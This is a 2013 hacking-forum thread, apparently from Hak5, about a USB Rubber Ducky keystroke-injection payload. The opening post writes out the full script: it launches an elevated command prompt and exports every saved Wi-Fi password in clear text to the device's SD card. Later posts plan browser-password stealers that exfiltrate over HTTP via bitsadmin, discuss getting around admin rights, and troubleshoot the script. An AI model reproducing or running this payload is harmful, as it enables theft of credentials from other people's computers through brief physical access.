crashie Posted March 10, 2013 Share Posted March 10, 2013 (edited) This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky. Requirement: This one is to be used with Twin Duck firmware. DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d DELAY 500 ENTER DELAY 300 STRING netsh wlan export profile folder=%myd%\ key=clear ENTER DELAY 500 STRING exit ENTER Edited March 10, 2013 by crashie Quote Link to comment Share on other sites More sharing options...
C3PBRO Posted March 11, 2013 Share Posted March 11, 2013 (edited) Great work with these new payloads man! keep it up! Edited March 11, 2013 by C3PBRO Quote Link to comment Share on other sites More sharing options...
crashie Posted March 11, 2013 Author Share Posted March 11, 2013 Thanks! I've been playing around all weekend and are getting the hang of things now :P I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights of course, it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there but some get flagged by the AV's like nirsofts and others are to heavy in size because of a GUI.. And btw, take a look at the bitsadmin payload.. sending files over HTTP :P Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P /crashie Great work with these new payloads man! keep it up! Quote Link to comment Share on other sites More sharing options...
shutin Posted March 14, 2013 Share Posted March 14, 2013 Really excited to see this. Does it require admin rights? Quote Link to comment Share on other sites More sharing options...
crashie Posted March 14, 2013 Author Share Posted March 14, 2013 Really excited to see this. Does it require admin rights? Yeah, sadly enough it does.. the CMD have to run as admin so the local user have to be in that group yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges. To steal the browser passwords (opera, safari, firefox, chrome) though it's not needed :P I will add that payload later this week when it's finished and tested completely. One version that saves it to the SD and one that send it out over HTTP. Bitsadmin works great for sending stuff over the Internet as HTTP but it requiers an IIS server on the other end. I am though working on an exploit to also be able to steal the Wi-Fi passwords in clear-text without being admin as I said.. but it will take some time to finish since I'm working on it alone. But I'll keep posting the results here :) /crashie Quote Link to comment Share on other sites More sharing options...
shutin Posted March 16, 2013 Share Posted March 16, 2013 Yeah, sadly enough it does.. the CMD have to run as admin so the local user have to be in that group yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges. /crashie Well.. I wrote a script using these basic techniques and it exported just fine since my user was as admin. I think the vast majority of people on windows are single users running with admin so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my sd card. I will try this script and see if it does the magic. Quote Link to comment Share on other sites More sharing options...
crashie Posted March 16, 2013 Author Share Posted March 16, 2013 Well.. I wrote a script using these basic techniques and it exported just fine since my user was as admin. I think the vast majority of people on windows are single users running with admin so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my sd card. I will try this script and see if it does the magic. Yeah, you're right :P Most of the users run as local admin. The wmic should work great.. works fine here at least :) Also have in mind your keyboard layout so it have the right symbols.. this one won't work with danish, norwegian, swedish layouts because a missing ^ in the properties file.. Quote Link to comment Share on other sites More sharing options...
Hackman1970 Posted September 18, 2013 Share Posted September 18, 2013 (edited) About this key ^ for norwegian, swedish and dannish, you may want to look at this post, se my comment at bottom of page: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/ Edited September 18, 2013 by Hackman1970 Quote Link to comment Share on other sites More sharing options...
waddell Posted September 19, 2013 Share Posted September 19, 2013 I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator. Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted September 22, 2013 Share Posted September 22, 2013 Added this to the tool kit I have made and made some modifications using powershell. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ Quote Link to comment Share on other sites More sharing options...
triphazard Posted October 15, 2013 Share Posted October 15, 2013 I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to right? Let windows do the work. http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html I plan on checking this out sometime when I get home tomorrow. But if the article is correct(Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista when they changed the way windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong. Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted October 17, 2013 Share Posted October 17, 2013 I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to right? Let windows do the work. http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html I plan on checking this out sometime when I get home tomorrow. But if the article is correct(Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista when they changed the way windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong. Hey I have added your idea to my power-ducky toolkit, It should work but I don't have a windows laptop with wireless to test. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted October 25, 2013 Share Posted October 25, 2013 You can't recover wifi keys without admin access. I've already attempted it, aswell as taking a look at some of Microsoft's tutorials on how the encryption angorithm works. It's impossible to recover the keys without the correct permissions. The payload "ULTIMATE DATA THEIF!" does way more than just stealing wifi passwords. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.